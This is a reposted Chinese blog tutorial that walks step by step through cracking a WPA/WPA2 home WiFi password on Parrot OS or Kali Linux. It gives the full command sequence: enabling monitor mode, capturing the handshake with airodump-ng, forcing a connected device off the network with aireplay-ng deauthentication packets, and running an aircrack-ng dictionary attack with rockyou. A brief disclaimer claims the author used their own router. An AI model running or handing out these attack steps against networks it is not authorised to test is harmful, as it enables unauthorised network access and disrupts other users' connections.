【转载】别人是怎么破解你们家无线密码的

来源:互联网 发布:优酷淘宝搞笑视频 编辑:程序博客网 时间:2024/04/30 10:08

今天想玩风暴英雄混个卡德加的头像,结果一直连不上,一气之下打开了之前安装在硬盘里的Parrot OS,准备日常更新下系统/软件什么的。结果发现搬了家之后还没有在Parrot上用过这的WiFi,大半夜的也不好叫醒临屋的妹子,正好Parrot是一个类似于Kali Linux的主要用于渗透测试的linux系统,所以就尝试着破解了自己家的wifi。
百度了下工具,黑吧的一篇帖子里这么讲挺不错的,整理在这里,Parrot和KALI都是DEBIAN的,大同小异。我把出问题的地方都找了资料更新在这(收藏,侵删,编者是我)。


 Kali Linux能做很多事,但是它主要以渗透测试及’破解wifi密码’闻名。(编者:Parrot也不错,而且更炫酷)

如果你使用Macbook,看这里:使用macbook破解WPA/WPA2 wifi密码

要求:

  • 安装有Kali Linux的计算机
  • 支持监控模式的网卡,笔记本电脑一般都支持
  • 字典文件
  • 时间和耐心

这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/usr/share/wordlists/rockyou.txt.gz。

使用前先解压:

# gzip -d /usr/share/wordlists/rockyou.txt.gz

(编者:建议用cp命令拷到你熟悉的路径下再解压,/tmp是个不错的选择)


注意:破解其他人的wifi密码是“犯罪”,so,don’t;我使用自己的无线路由器演示。

知道了攻击方法,你自然就知道怎么防范了。


1)首先断开连接的wifi。

在终端中执行:

# airmon-ng

破解wifi密码

上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式。

2)开启无线网卡的监控模式

# airmon-ng start wlan0

破解wifi密码

执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。

3)查看wifi网络

# airodump-ng wlan0mon

破解wifi密码

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。

按Ctrl-C结束。

4)抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包。其中,对我们最重要的数据包是:包含密码的包-也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。

开始抓包:

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

(编者:此处我手写运行了这条命令后终端报了一个“Not interface specified”的错误,百度了另一篇帖子之后,在"-c 6 "之后加上了"wlan0mon"就可以了,现在回过头来看,原来是误会了作者的意思。最后的"wlan0mon"和“~/”之间是有空格的,并不是一个东西)

参数解释:

  • -c指定频道号
  • –bssid指定路由器bssid
  • -w指定抓取的数据包保存位置
  • 最后要空格加上wlan0mon

破解wifi密码

5)强制连接到wifi的设备重新连接路由器

现在我们只要等用户连接/重连接wifi了,运气不好也许要很长时间。

但是我们是不会等的,这不是耐心黑客该干的事。有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。

打开新终端执行:

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

参数解释:

  • -0指定发送反认证包的个数
  • -a指定无线路由器BSSID
  • -c指定强制断开的设备

破解wifi密码

如果成功:

破解wifi密码

按Ctrl-C结束抓包。

我们已经得到了想要的握手包了,可以结束无线网卡的监控模式了:

# airmon-ng stop wlan0mon

破解wifi密码

6) 开始破解密码

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

参数解释:

  • -a2代表WPA的握手包
  • -b指定要破解的wifi BSSID。
  • -w指定字典文件
  • 最后是抓取的包

破解wifi密码


文章还附带了一个用GPU来跑字典的方法

最后用黑8的一句话:内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不作恶,黑客维护网络安全


原创粉丝点击